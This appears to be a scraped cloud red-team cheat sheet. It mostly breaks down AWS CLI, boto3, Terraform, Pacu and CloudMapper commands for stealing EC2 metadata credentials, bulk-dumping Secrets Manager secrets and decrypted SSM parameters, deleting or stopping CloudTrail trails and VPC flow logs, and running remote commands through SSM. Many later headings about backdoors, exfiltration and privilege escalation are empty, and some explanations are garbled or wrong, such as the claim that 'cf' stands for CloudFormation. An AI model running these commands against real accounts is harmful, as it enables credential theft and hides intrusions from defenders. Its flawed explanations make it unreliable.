  1. aws ec2 describe-instances --query 'Reservations[].Instances[].{InstanceId: InstanceId, State: State.Name, PasswordData: PasswordData}': This command uses the AWS CLI (aws) to describe EC2 instances in the AWS account. The --query option specifies a custom query to retrieve specific attributes for each instance, including the instance ID, state, and password data.
  2. jq -r '.[] | select(.State == "running") | select(.PasswordData != null) | {InstanceId: .InstanceId, PasswordData: .PasswordData}': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that are in the “running” state and have non-null password data. It constructs a new JSON object containing the instance ID and password data.
  3. grep -i "RDP": This command uses grep to search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
   
  1. python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command runs the cloudmapper.py script to collect AWS account data for the specified <account_name> in the specified regions (<region1,region2>). It gathers information about the account’s resources and configurations.
  2. python cloudmapper.py --account <account_name> enum --services ec2 --region <region1,region2>: This command runs the cloudmapper.py script to perform enumeration on the specified AWS account (<account_name>) and target the EC2 service in the specified regions (<region1,region2>). It focuses on gathering information specifically related to EC2 instances.
  3. jq -r '.EC2[] | select(.password_data != null) | {InstanceId: .instance_id, PasswordData: .password_data}': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that have non-null password_data and constructs a new JSON object containing the instance ID and password data.
  4. grep -i "RDP": This command uses grep to search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
   
  1. python pacu.py: This command executes the pacu.py script, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
  2. --no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
  3. --profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The <profile_name> should correspond to a configured AWS profile containing valid credentials.
  4. --module ec2__get_password_data: This option specifies the specific PACU module to run. In this case, it runs the ec2__get_password_data module, which retrieves password data for EC2 instances.
  5. --regions <region1,region2>: This option specifies the AWS regions to target. The <region1,region2> values represent a comma-separated list of regions where the ec2__get_password_data module will be executed.
  6. --identifier "RDP": This option configures an identifier for the module. In this case, the identifier is set as “RDP”, indicating that the module will search for EC2 instances with password data related to RDP (Remote Desktop Protocol).
  7. --json: This option instructs PACU to output the results in JSON format.
  8. | grep -i "RDP": This part of the command uses grep to search for lines that contain the case-insensitive string “RDP” within the JSON output generated by PACU. It filters the output to show only instances where the password data indicates the presence of RDP configuration.

Steal EC2 Instance Credentials

   
  1. curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command sends an HTTP GET request to the specified URL, which is the metadata service endpoint on an EC2 instance. It retrieves a list of available IAM security credentials.
  2. xargs -I {} curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{} | jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command uses xargs to process each item (IAM security credential) from the previous command and substitute it into the subsequent command.b. jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command uses jq to parse the JSON output obtained from the previous command and extract specific fields, namely AccessKeyId, SecretAccessKey, and Token. The -r option outputs the results in raw (non-quoted) format.
  3. a. curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command sends an HTTP GET request to retrieve the metadata of a specific IAM security credential.
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command executes the imds-helper tool with the specified URL as the argument. The tool interacts with the metadata service to retrieve information about IAM security credentials.
  2. grep -E "AccessKeyId|SecretAccessKey|Token": This command uses grep with the -E option to perform a pattern match using an extended regular expression. It filters the output of the imds-helper command and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.
   
  1. python pacu.py: This command executes the pacu.py script, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
  2. --no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
  3. --profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The <profile_name> should correspond to a configured AWS profile containing valid credentials.
  4. --module imds__gather_credentials: This option specifies the specific PACU module to run. In this case, it runs the imds__gather_credentials module, which collects IAM security credentials from the instance metadata service.
  5. --json: This option instructs PACU to output the results in JSON format.
  6. | grep -E "AccessKeyId|SecretAccessKey|Token": This part of the command uses grep with the -E option to perform a pattern match using an extended regular expression. It filters the JSON output generated by PACU and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.

Retrieve a High Number of Secrets Manager secrets

   
  1. ccat: This command executes the ccat tool, which is used to syntax-highlight and display the contents of files or outputs in the terminal.
  2. secretsmanager get-secret-value <secret_name>: This command specifies the AWS Secrets Manager operation to retrieve the value of a secret with the specified <secret_name>. The <secret_name> should correspond to the name or ARN (Amazon Resource Name) of the secret stored in AWS Secrets Manager.
   
  1. aws secretsmanager list-secrets --query 'SecretList[].Name': This AWS CLI command lists the names of secrets stored in AWS Secrets Manager. The --query parameter specifies the JSON path expression to retrieve only the Name field of each secret.
  2. jq -r '.[]': This jq command reads the JSON output from the previous command and extracts the values of the Name field. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each secret name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current secret name.
  4. jq -r '.SecretString': This jq command reads the JSON output from the previous AWS CLI command and extracts the value of the SecretString field. The -r option outputs the result in raw (non-quoted) format.
   
  1. cf s3ls: This command is specific to the CloudFuzzer (CF) tool. It is used to list the objects within an Amazon S3 bucket.
  2. <bucket_name>: This parameter specifies the name of the S3 bucket for which you want to list the objects. Replace <bucket_name> with the actual name of the bucket you want to query.
   
  1. s3bucketbrute --bucket-prefixes <prefix_list> --region <region>: This command executes the s3bucketbrute tool, which is used for brute forcing or guessing the names of Amazon S3 buckets. The --bucket-prefixes option specifies a list of bucket name prefixes to use in the brute force search, and the --region option specifies the AWS region where the buckets should be searched.
  2. jq -r '.[].Name': This jq command reads the JSON output from the previous command and extracts the values of the Name field for each discovered S3 bucket. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each bucket name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of the secret associated with each bucket by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current bucket name.
   
  1. python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command executes the CloudMapper tool and instructs it to collect information about the specified AWS account (<account_name>) in the specified regions (<region1,region2>). The collect command gathers data about the account’s resources and configurations.
  2. &&: This operator allows the subsequent command to be executed only if the previous command (python cloudmapper.py --account <account_name> collect --regions <region1,region2>) completes successfully.
  3. python cloudmapper.py --account <account_name> enum --services secretsmanager --region <region1,region2>: This command continues the execution of CloudMapper and instructs it to enumerate secrets stored in AWS Secrets Manager for the specified account and regions. The enum command focuses on the specified service (secretsmanager) and retrieves relevant information.
  4. jq -r '.SecretsManager[] | {SecretId: .arn}': This jq command processes the JSON output from the previous CloudMapper command and extracts the SecretId (ARN) of each secret stored in AWS Secrets Manager. The -r option outputs the results in raw (non-quoted) format.
  5. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each secret ARN obtained from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current secret ARN.

Retrieve And Decrypt SSM Parameters

   
  1. aws ssm describe-parameters --query 'Parameters[].Name': This AWS CLI command retrieves a list of parameter names from the SSM Parameter Store using the describe-parameters operation. The --query parameter specifies the JSON query to extract the Name field from the response.
  2. jq -r '.[]': This jq command processes the JSON output from the previous command and extracts the values of the Name field for each parameter. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws ssm get-parameter --name {} --with-decryption: This command uses xargs to process each parameter name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each parameter by calling aws ssm get-parameter with the --name parameter set to the current parameter name. The --with-decryption option is used to retrieve decrypted values if the parameter is encrypted.
  4. jq -r '.Parameter.Value': This jq command processes the JSON output from the previous aws ssm get-parameter command and extracts the value of the parameter. The -r option outputs the result in raw (non-quoted) format.
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command makes a request to the IMDS endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/) to retrieve the security credentials associated with the IAM role assigned to the EC2 instance. The imds-helper tool facilitates the interaction with the IMDS.
  2. jq -r '.[]': This jq command processes the JSON response from the previous command and extracts the values of all fields. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {}: This command sets up a placeholder {} that will be replaced with each value from the previous jq command.
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command uses imds-helperto make a request to the Instance Metadata Service (IMDS) endpoint with a placeholder{}` that will be replaced with a specific IAM role name. It retrieves the security credentials associated with the specified IAM role.
  2. jq -r '.AccessKeyId': This jq command processes the JSON response from the previous command and extracts the AccessKeyId field from it. The -r option outputs the result in raw (non-quoted) format.
  3. xargs -I {} aws sts assume-role --role-arn <role_arn> --role-session-name "bugbounty" --external-id <external_id> --region <region> --profile {}: This command uses xargs to substitute the IAM role name obtained from the previous jq command into the subsequent aws sts assume-role command. It assumes the specified IAM role, generating temporary security credentials for the assumed role. The --role-arn, --role-session-name, --external-id, --region, and --profile options are provided to configure the role assumption.
  4. jq -r '.Credentials.AccessKeyId, .Credentials.SecretAccessKey, .Credentials.SessionToken': This jq command processes the JSON response from the previous aws sts assume-role command and extracts the AccessKeyId, SecretAccessKey, and SessionToken fields from it. The -r option outputs the results in raw (non-quoted) format.
  5. xargs -I {} aws ssm describe-parameters --query 'Parameters[].Name' --region <region> --profile {}: This command uses xargs to substitute the IAM profile name obtained from the previous jq command into the subsequent aws ssm describe-parameters command. It retrieves a list of parameter names from AWS SSM Parameter Store. The --query, --region, and --profile options are provided to configure the command.
  6. jq -r '.[]': This jq command processes the JSON response from the previous aws ssm describe-parameters command and extracts the values of the parameter names. The -r option outputs the results in raw (non-quoted) format.
  7. xargs -I {} aws ssm get-parameter --name {} --with-decryption --region <region> --profile {}: This command uses xargs to substitute each parameter name obtained from the previous jq command into the subsequent aws ssm get-parameter command. It retrieves the values of each parameter from AWS SSM Parameter Store. The --name, --with-decryption, --region, and --profile options are provided to configure the command.
  8. jq -r '.Parameter.Value': This jq command processes the JSON response from the previous aws ssm get-parameter command and extracts the values of the parameters. The -r option outputs the results in raw (non-quoted) format.

Delete CloudTrail Trail

   
  1. aws cloudtrail delete-trail: This command is part of the AWS Command Line Interface (CLI) and is used to delete a CloudTrail trail.
  2. --name <trail_name>: This option specifies the name of the CloudTrail trail to be deleted. Replace <trail_name> with the actual name of the trail you want to delete.
  3. --region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate AWS region code (e.g., us-west-2, eu-central-1, etc.) where the trail exists.
   

By running ccat cloudtrail, the command will attempt to format and enhance the display of CloudTrail log files for better readability. It may apply syntax highlighting, indentation, or other visual enhancements to make the log content easier to analyze and interpret. This can be particularly useful when working with large or complex CloudTrail logs, as it helps highlight key information and improve overall readability.

   
  1. python: This command is used to execute Python code from the command line.
  2. -c "<code>": This option allows you to pass a string of Python code directly on the command line.
  3. "import boto3; boto3.client('cloudtrail').delete_trail(Name='<trail_name>', RegionName='<region>')": This is the Python code being executed. It performs the following steps:
    • Imports the boto3 library, which is the AWS SDK for Python.
    • Uses the boto3.client('cloudtrail') method to create a client object for interacting with the AWS CloudTrail service.
    • Calls the delete_trail() method on the CloudTrail client, passing the Name and RegionName parameters.
    • Replace <trail_name> with the actual name of the CloudTrail trail you want to delete, and <region> with the appropriate AWS region code.
   
  1. terraform init: This command initializes a Terraform working directory by downloading the necessary provider plugins and setting up the environment.
  2. terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing AWS CloudTrail resource into the Terraform state. The <trail_arn> should be replaced with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to import. By importing the resource, Terraform gains awareness of its existence and configuration.
  3. terraform destroy -auto-approve: This command destroys the infrastructure defined in your Terraform configuration and removes any associated resources. The -auto-approve flag is used to automatically approve the destruction without requiring manual confirmation. This command will delete the CloudTrail resource that was imported in the previous step.

Disable CloudTrail Logging Through Event Selectors

   
  1. aws cloudtrail put-event-selectors: This command is part of the AWS Command Line Interface (CLI) and is used to configure event selectors for an AWS CloudTrail trail.
  2. --trail-name <trail_name>: This option specifies the name of the CloudTrail trail for which you want to configure event selectors. Replace <trail_name> with the actual name of the trail.
  3. --event-selectors '[{"ReadWriteType": "ReadOnly"}]': This option specifies the event selectors to be configured for the CloudTrail trail. In this example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" indicates that the event selector should only capture read-only events. You can customize the event selector based on your specific requirements.
  4. --region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate AWS region code (e.g., us-west-2, eu-central-1, etc.) where the trail exists.
   
  1. python: This command is used to execute Python code from the command line.
  2. -c "<code>": This option allows you to pass a string of Python code directly on the command line.
  3. "import boto3; boto3.client('cloudtrail').put_event_selectors(TrailName='<trail_name>', EventSelectors=[{'ReadWriteType': 'ReadOnly'}], RegionName='<region>')": This is the Python code being executed. It performs the following steps:
    • Imports the boto3 library, which is the AWS SDK for Python.
    • Uses the boto3.client('cloudtrail') method to create a client object for interacting with the AWS CloudTrail service.
    • Calls the put_event_selectors() method on the CloudTrail client, passing the TrailName, EventSelectors, and RegionName parameters.
    • Replace <trail_name> with the actual name of the CloudTrail trail you want to configure, and <region> with the appropriate AWS region code.
    • The EventSelectors parameter is set as a list with a single dictionary object, specifying the ReadWriteType as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
   
  1. terraform init: This command initializes the Terraform working directory, downloading any necessary provider plugins and setting up the environment.
  2. terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing CloudTrail resource into the Terraform state. The aws_cloudtrail.this refers to the Terraform resource representing the CloudTrail trail, and <trail_arn> is the ARN (Amazon Resource Name) of the CloudTrail trail you want to import. This step allows Terraform to manage the configuration of the existing resource.
  3. terraform apply -auto-approve -var 'event_selector=[{read_write_type="ReadOnly"}]': This command applies the changes specified in the Terraform configuration to provision or update resources. The -auto-approve flag automatically approves the changes without asking for confirmation.
    • The -var 'event_selector=[{read_write_type="ReadOnly"}]' option sets the value of the event_selector variable to configure the event selectors for the CloudTrail trail. In this example, a single event selector is provided as a list with a single dictionary object, specifying the read_write_type as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.

CloudTrail Logs Impairment Through S3 Lifecycle Rule

   
  1. aws s3api put-bucket-lifecycle: This command is used to configure the lifecycle policy for an S3 bucket.
  2. --bucket <bucket_name>: Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
  3. --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}': This option specifies the configuration of the lifecycle rule. The configuration is provided as a JSON string. In this example, the configuration includes a single rule with the following properties:
    • Status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
    • Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
    • Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
  4. --region <region>: Replace <region> with the appropriate AWS region code where the S3 bucket is located.
   
  1. import boto3: This line imports the Boto3 library, which is the AWS SDK for Python.
  2. s3 = boto3.client('s3'): This line creates a client object for the S3 service using the Boto3 library. This client object allows interaction with the S3 API.
  3. s3.put_bucket_lifecycle_configuration(Bucket='<bucket_name>', LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}): This line invokes the put_bucket_lifecycle_configuration method of the S3 client to configure the lifecycle rule for the specified bucket.
    • Bucket='<bucket_name>': Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
    • LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}: This argument specifies the configuration of the lifecycle rule. It is provided as a dictionary with a single key, ‘Rules’, which maps to a list of rule dictionaries. In this example, there is a single rule with the following properties:
      • Status: Specifies the status of the rule. In this case, it is set to ‘Enabled’ to activate the rule.
      • Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
      • Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
   
  1. terraform init: This command initializes the Terraform working directory by downloading the necessary provider plugins and setting up the backend.
  2. terraform import aws_s3_bucket.lifecycle <bucket_name>: This command imports an existing S3 bucket into Terraform as a resource. Replace <bucket_name> with the actual name of the S3 bucket you want to import. This step associates the existing bucket with the Terraform configuration.
  3. terraform apply -auto-approve -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This command applies the Terraform configuration, deploying the resources defined in the Terraform files.
    • -auto-approve: This flag automatically approves the proposed changes without requiring manual confirmation.
    • -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This flag sets a variable named lifecycle_rule in the Terraform configuration. It specifies the configuration for the lifecycle rule using a list of one rule object. The rule object has the following properties:
      • status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
      • prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
      • expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (days=7).

Stop Cloud Trail Trail

   
  • --name <trail_name>: Specifies the name of the CloudTrail trail to stop logging. Replace <trail_name> with the actual name of the trail you want to stop logging for.
  • --region <region>: Specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  1. import boto3: This imports the Boto3 library, which is the AWS SDK for Python.
  2. boto3.client('cloudtrail'): This creates a client object for the CloudTrail service using Boto3.
  3. .stop_logging(Name='<trail_name>', RegionName='<region>'): This invokes the stop_logging method of the CloudTrail client to stop logging for a specific trail.
    • Name='<trail_name>': Specifies the name of the CloudTrail trail to stop logging for. Replace <trail_name> with the actual name of the trail you want to stop logging for.
    • RegionName='<region>': Specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  1. terraform init: Initializes the Terraform working directory, downloading the necessary provider plugins and modules.
  2. terraform import aws_cloudtrail.this <trail_arn>: Imports the existing CloudTrail resource into the Terraform state. Replace <trail_arn> with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to manage with Terraform.
  3. terraform apply -auto-approve -var 'enable_logging=false': Applies the Terraform configuration, making changes to the infrastructure. The -auto-approve flag skips the interactive approval step, while the -var flag sets the variable enable_logging to false. This variable is used in the Terraform configuration to control whether CloudTrail logging is enabled or disabled.

Attempt to Leave the AWS Organization

   
  • aws organizations deregister-account: This is the AWS CLI command to deregister an AWS account from an AWS Organization.
  • --account-id <account_id>: Specifies the ID of the AWS account you want to deregister. Replace <account_id> with the actual ID of the account you want to deregister.
  • --region <region>: Specifies the AWS region where the AWS Organizations service is located. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  • import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services.
  • boto3.client('organizations').deregister_account(AccountId='<account_id>'): Creates a client for the AWS Organizations service using Boto3 and calls the deregister_account method on the client. The AccountId parameter should be replaced with the actual ID of the AWS account you want to deregister.
   
  • terraform init: Initializes the Terraform configuration in the current directory.
  • terraform import aws_organizations_account.this <account_id>: Imports an existing AWS account into Terraform. The aws_organizations_account.this resource represents an AWS account in the Terraform configuration, and <account_id> should be replaced with the actual ID of the AWS account you want to manage.
  • terraform apply -auto-approve -var 'enable_organization=false': Applies the Terraform configuration and provisions or updates resources. The -auto-approve flag automatically approves the execution without requiring user confirmation. The -var 'enable_organization=false' flag sets the value of the enable_organization variable to false, indicating that the AWS Organization should be disabled.

Remove VPC Flow Logs

   
  • aws ec2 delete-flow-logs: Executes the AWS CLI command to delete VPC flow logs.
  • --flow-log-ids <flow_log_ids>: Specifies the IDs of the flow logs to be deleted. <flow_log_ids> should be replaced with the actual IDs of the flow logs you want to delete.
  • --region <region>: Specifies the AWS region where the flow logs are located. <region> should be replaced with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  • import boto3: Imports the Boto3 library, which is the official AWS SDK for Python.
  • ec2 = boto3.client('ec2'): Creates an EC2 client object using Boto3.
  • ec2.delete_flow_logs(FlowLogIds=['<flow_log_id_1>', '<flow_log_id_2>']): Calls the delete_flow_logs method of the EC2 client to delete VPC flow logs. Replace <flow_log_id_1> and <flow_log_id_2> with the actual IDs of the flow logs you want to delete.
   
  • terraform init: Initializes the Terraform working directory by downloading the necessary provider plugins and configuring the backend.
  • terraform import aws_flow_log.this <flow_log_id>: Imports an existing VPC flow log into the Terraform state. Replace <flow_log_id> with the actual ID of the flow log you want to manage with Terraform. This command associates the flow log with the Terraform resource named aws_flow_log.this.
  • terraform destroy -auto-approve: Destroys the Terraform-managed resources specified in the configuration files. The -auto-approve flag is used to automatically approve the destruction without requiring user confirmation.

Execute Discovery Commands on an EC2 Instance

   
  • cf: This is a command-line tool that provides simplified access to various AWS services and functionalities. It stands for “CloudFormation.”
  • aws ecs exec: This is a subcommand of the cf tool specifically for interacting with AWS ECS.
  • -b: This flag is used to specify the task or container to execute the command in. It allows you to select a specific task or container within an ECS cluster.
   
  • aws ssm send-command: This is the AWS CLI command to interact with AWS Systems Manager and send a command.
  • --instance-ids <instance_id>: This option specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a comma-separated list of multiple instance IDs.
  • --document-name "AWS-RunShellScript": This option specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
  • --parameters '{"commands":["<command_1>", "<command_2>", "<command_3>"]}': This option specifies the parameters for the command. The commands parameter is an array of shell commands to be executed on the instances.
  • --region <region>: This option specifies the AWS region where the instances are located.
   
  • import boto3: This imports the Boto3 library, which provides an interface to interact with AWS services using Python.
  • ssm = boto3.client('ssm'): This creates an SSM (Systems Manager) client object using the boto3.client() method. The client object allows interaction with AWS Systems Manager.
  • ssm.send_command(...): This invokes the send_command() method of the SSM client to send a command to the specified instance(s).
    • InstanceIds=['<instance_id>']: This parameter specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a list of multiple instance IDs.
    • DocumentName='AWS-RunShellScript': This parameter specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
    • Parameters={'commands':['<command_1>', '<command_2>', '<command_3>']}: This parameter specifies the parameters for the command. The commands parameter is a list of shell commands to be executed on the instances.
   
  1. terraform init: This command initializes the Terraform working directory by downloading and configuring the necessary providers and modules.
  2. terraform import aws_instance.this <instance_id>: This command imports an existing EC2 instance into the Terraform state. It associates the specified <instance_id> with the aws_instance.this resource in the Terraform configuration.
  3. terraform apply -auto-approve -var 'command="<command_1>; <command_2>; <command_3>"': This command applies the Terraform configuration and provisions or modifies the infrastructure as necessary. The -auto-approve flag skips the interactive approval prompt. The -var flag sets a variable named command to the provided value, which represents a series of shell commands <command_1>; <command_2>; <command_3> to be executed on the EC2 instance.

Download EC2 Instance User Data

   
  1. aws ec2 describe-instance-attribute --instance-id <instance_id> --attribute userData --query "UserData.Value" --output text --region <region>: This AWS CLI command describes the specified EC2 instance attribute, which in this case is the user data. The <instance_id> parameter is the ID of the EC2 instance for which you want to retrieve the user data, and the <region> parameter specifies the AWS region where the instance is located. The --query option extracts the value of the UserData.Value attribute, and the --output option sets the output format to text.
  2. base64 --decode: This command decodes the base64-encoded user data retrieved from the previous AWS CLI command. The --decode option instructs the base64 command to perform the decoding operation.
   
  1. import boto3: This imports the Boto3 library, which is the official AWS SDK for Python.
  2. ec2 = boto3.client('ec2'): This creates an EC2 client object using Boto3.
  3. response = ec2.describe_instance_attribute(InstanceId='<instance_id>', Attribute='userData'): This calls the describe_instance_attribute method of the EC2 client to retrieve the specified attribute of the EC2 instance. The <instance_id> parameter is the ID of the EC2 instance, and the Attribute parameter is set to 'userData' to retrieve the user data.
  4. print(response['UserData']['Value'].decode('base64')): This retrieves the value of the 'UserData' key from the response, which contains the base64-encoded user data. The decode('base64') method is used to decode the base64-encoded user data. The decoded user data is then printed to the console.
   
  1. terraform init: Initializes the Terraform working directory, downloading any necessary providers and setting up the environment.
  2. terraform import aws_instance.this <instance_id>: Imports an existing EC2 instance into the Terraform state. This associates the EC2 instance in the AWS account with the corresponding Terraform resource.
  3. terraform apply -auto-approve -var 'instance_id=<instance_id>': Applies the Terraform configuration and provisions any required resources. The -auto-approve flag skips the interactive confirmation prompt, and the -var flag sets the value of the instance_id variable used within the Terraform configuration.

Launch Unusual EC2 instances

   
  • --image-id <image_id>: Specifies the ID of the Amazon Machine Image (AMI) to use as the base for the EC2 instance. It defines the operating system and other software installed on the instance.
  • --instance-type p2.xlarge: Specifies the instance type, which determines the hardware specifications (such as CPU, memory, and storage capacity) of the EC2 instance. In this case, p2.xlarge is the instance type.
  • --count 1: Specifies the number of instances to launch. In this case, it launches a single instance.
  • --region <region>: Specifies the AWS region in which to launch the instance. The region defines the geographical location where the EC2 instance will be provisioned.
   

The -var 'instance_type=p2.xlarge' option is used to set a variable named instance_type to the value p2.xlarge. This variable can be referenced in the Terraform configuration files to dynamically configure resources.

   
  • import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services using Python.
  • ec2 = boto3.resource('ec2'): Creates an EC2 resource object using Boto3. This resource object allows us to interact with EC2 instances.
  • instance = ec2.create_instances(ImageId='<image_id>', InstanceType='p2.xlarge', MinCount=1, MaxCount=1): Creates a new EC2 instance using the specified image ID and instance type. The MinCount and MaxCount parameters are both set to 1, indicating that a single instance should be launched.
  • print(instance[0].id): Prints the ID of the created EC2 instance. The instance variable is a list, and instance[0] refers to the first (and in this case, the only) instance in the list. The .id attribute retrieves the ID of the instance.

Execute Commands on EC2 Instance via User Data

   
   
   

Open Ingress Port 22 on a Security Group

   
   
   

Exfiltrate an AMI by Sharing It

   
   
   

Exfiltrate EBS Snapshot by Sharing It

   
   
   

Exfiltrate RDS Snapshot by Sharing

   
   
   

Backdoor an S3 Bucket via its Bucket Policy

   
   
   

Console Login without MFA

   
   
   

Backdoor an IAM Role

   
   
   
   

Create an Access Key on an IAM User

   
   
   

Create an administrative IAM User

   
   
   

Create a Login Profile on an IAM User

   
   
   

Backdoor Lambda Function Through Resource-Based Policy

   
   
   

Overwrite Lambda Function Code

   
   
   

Create an IAM Roles Anywhere trust anchor

   
   
   

Execute Command on Virtual Machine using Custom Script Extension

   
   
   

Execute Commands on Virtual Machine using Run Command

   
   
   

Export Disk Through SAS URL

   
   
   

Create an Admin GCP Service Account

   
   
   

Create a GCP Service Account Key

   
   
   

Impersonate GCP Service Accounts

   
   
   

Privilege escalation through KMS key policy modifications

   
   
   
   
   

Enumeration of EKS clusters and associated resources

   
   
   

Privilege escalation through RDS database credentials

   
   
   

Enumeration of open S3 buckets and their contents

   
   
   

Privilege escalation through EC2 instance takeover

   
   
   

Enumeration of AWS Glue Data Catalog databases

   
   
   

Privilege escalation through assumed role sessions

   
   
   

Enumeration of ECS clusters and services

   
   
   

Privilege escalation through hijacking AWS SDK sessions

   
   
   

Enumeration of ECR repositories with public access

   
   
   

Privilege escalation through hijacking AWS CLI sessions

   
   
   

Enumeration of Elastic Beanstalk environments with public access

   
   
   

Privilege escalation by attaching an EC2 instance profile

   
   
   
   

Stealing EC2 instance metadata

   
   
   

Enumeration of EC2 instances with public IP addresses

   
   
   

Enumeration of AWS Systems Manager parameters

   
   
   

Privilege escalation through EC2 metadata

   
  • curl: The command-line tool used to perform the HTTP request.
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace <role_name> with the name of the IAM role.
   

In this command, the pacu.py script is being executed with the escalate_iam_roles method, which is specifically designed to escalate privileges associated with IAM roles. The --profile option specifies the AWS profile to use for authentication, and the --regions option specifies the AWS regions to target. The --instances option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.

AWS cross-account enumeration

   
  • python3 cloudmapper.py: Executes the CloudMapper tool using the Python 3 interpreter.
  • enum --account <account_id> --regions <aws_regions>: Specifies the enumeration mode and provides additional parameters to configure the account and regions to scan.
    • --account <account_id>: Specifies the AWS account ID to scan. Replace <account_id> with the actual AWS account ID you want to enumerate.
    • --regions <aws_regions>: Specifies the AWS regions to scan. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
   
  • python3 pacu.py: Executes the PACU tool using the Python 3 interpreter.
  • --method enum_organizations: Specifies the specific method to run, in this case, enum_organizations, which is responsible for enumerating AWS Organizations.
  • --profile <aws_profile>: Specifies the AWS profile to use for authentication. Replace <aws_profile> with the name of the AWS profile configured on your system.
  • --regions <aws_regions>: Specifies the AWS regions to target for enumeration. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
   
  • aws sts assume-role: Initiates the assume-role operation using the AWS Security Token Service (STS).
  • --role-arn arn:aws:iam::<target_account_id>:role/<role_name>: Specifies the ARN (Amazon Resource Name) of the IAM role you want to assume. Replace <target_account_id> with the ID of the AWS account that owns the role, and <role_name> with the name of the IAM role.
  • --role-session-name <session_name>: Specifies the name for the session associated with the assumed role. Replace <session_name> with a descriptive name for the session.

Secure Configuration

https://github.com/FalconForceTeam/FalconFriday

Detection

https://github.com/FalconForceTeam/FalconFriday

